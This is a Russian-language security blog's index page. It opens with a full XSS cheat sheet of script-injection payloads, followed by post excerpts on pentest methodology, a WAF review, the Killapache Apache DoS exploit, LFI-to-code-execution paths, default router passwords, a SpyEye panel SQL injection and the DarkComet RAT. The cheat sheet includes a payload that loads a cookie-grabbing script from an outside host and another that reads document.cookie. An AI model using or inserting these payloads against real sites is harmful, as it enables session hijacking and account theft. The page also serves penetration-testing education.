insecurity, 1.29.2013

XSS Cheat Sheet

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>

Подборка документов по методологии проведения тестов на проникновение

insecurity, 7.19.2012

Технический аудит
http://secinsight.blogspot.com/2011/09/1.html

http://whoguardtheguardians.blogspot.com/2011/11/penetration-testing.html - Методология проведения Penetration testing

PTES - Penetration Testing Execution Standart
http://www.pentest-standard.org/index.php/Main_Page

Penetration Testing Framework
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html

Дальше »

Обзор WAF (Web Application Firewall) с открытым исходным кодом.

insecurity, 10.13.2011

Фаервол для веб-приложений WAF (Web Application Firewall) это устройство, плагин веб-сервера или программный фильтр который устанавливает правила обмена данными по протоколу HTTP. Обычно WAF применяется как некая контрмера против общераспространенных атак на веб-приложения, например такие как Межсайтовый скриптинг (Cross-site Scripting (XSS)), Cross Site Request Forgery (CSRF), SQL-инъекция. OWASP предлагает следующие критерии выбора WAF.

Дальше »

Gray Hat Hacking The Ethical Hacker's Handbook. 3rd Edition. РЕЦЕНЗИЯ

insecurity, 10.10.2011

Намедни мне на глаза попалась книга на английском языке под названием Gray Hat Hacking. The Ethical Hacker's Handbook. 3rd Edition. Книга выпущена относительно недавно, в начале 2011 года.

Данная книга представляет собой своего рода учебник типа "все в одном" для начинающих специалистов по безопасности, хакеров и пентестеров.

Учебник состоит из ряда разделов, в каждом из которых в объеме 1-2 десятка

Дальше »

Killapache модифицированная версия

insecurity, 10.03.2011

Ранее на разных сайтах, повсвященных ИБ в деталях описывалась информация касательно утилиты-эксплоита под названием "Killapache". Данная утилита предназначена для проведения DDOS-атаки на самый известный и распространенный в сети интернет веб-сервер : Apache. На данный момент программа Killapache, ранее написанная неким kingscope, была несколько модифицирована и дописана кодером “S4(uR4“. Модифицированный Killapache, как и изначальный вариант программы вызывает отказ в облуживании веб-сервера Apache, эксплуатируя при этом одну из уязвимостей.

Дальше »

Local File Including с помощью phpinfo()

insecurity, 10.01.2011

Ввведение

При проведении анализа уязвимостей php-приложений все еще остается весьма распространенной уязвимость типа LFI (Local File Incuding).

В зависимости от конфигурации сервера очень часто существуют возможности выполнить код на целевой удаленной системе с помощью известных и распространенных техник и методов, таких как:

/proc/self/environ
/proc/self/fd/...
/var/log/...
/var/lib/php/session/ (PHP Sessions)
/tmp/ (PHP Sessions)
php://input wrapper
php://filter wrapper
data: wrapper

Дальше »

Обход парольной защиты маршрутизатора

insecurity, 9.25.2011

Часто в небольших офисных или домашних сетях используется маленький малопортовый маршрутизатор или домашний хаб, которые часто также являются не просто чистыми маршрутизаторами а гибридами ADSL-модема и switch'a. Они относительно просты в установке и настройке, и как следствие часто устанавливаются с паролем по умолчанию. В сети интернет с легкостью можно найти списки моделей подобных устройств и соответствующие им заводские пароли к административной части, установленные по умолчанию. Примеры таких списков можно найти здесь:

http://routerpasswords.com/

Дальше »

Google API + Perl глазами хакера. (Programming Google API with Perl)

insecurity, 9.19.2011

Часть 0. Введение
Итак уже появились туториалы о том как юзать инклуде-баг, как юзать ботов usun'a. Я же раскажу о том как написать этих ботов своими собственными руками. Что же такое Google API - это стандартный набор фукций, которыми пользуется сам поисковик гугла, те мы получаем уникальную

Дальше »

Слепая sql-инъекция обнаружена в Spy eye botnet. Эксплоит.

insecurity,

Слепая sql-инъекция (blind sql-injection) обнаружена в файле frm_cards_edit.php админ-панели Spy eye botnet.

Тип уязвмимости : Blind SQL injection
Уязвимый скрипт : frm_cards_edit.php
Версии подверженные уязвимости: Все

Дальше »

DarkComet-RAT v4.0 fix 1. Утилита удаленного администрирования

insecurity, 9.14.2011

DarkComet-RAT это утилита предназначенная для скрытого удаленного администрирования. DarkComet-RAT разработана для удобного и комфортного удаленного управления удаленным компьютером с ОС MS Windows (поддерживаются все версии начиная с w2k).

Дальше »

XSS Cheat Sheet

Подборка документов по методологии проведения тестов на проникновение

Обзор WAF (Web Application Firewall) с открытым исходным кодом.

Gray Hat Hacking The Ethical Hacker's Handbook. 3rd Edition. РЕЦЕНЗИЯ

Killapache модифицированная версия

Local File Including с помощью phpinfo()

Обход парольной защиты маршрутизатора

Google API + Perl глазами хакера. (Programming Google API with Perl)

Слепая sql-инъекция обнаружена в Spy eye botnet. Эксплоит.

DarkComet-RAT v4.0 fix 1. Утилита удаленного администрирования

Страницы

Категории

Архив блога

Облако тегов

Securityvulns news channel

SecurityFocus Vulnerabilities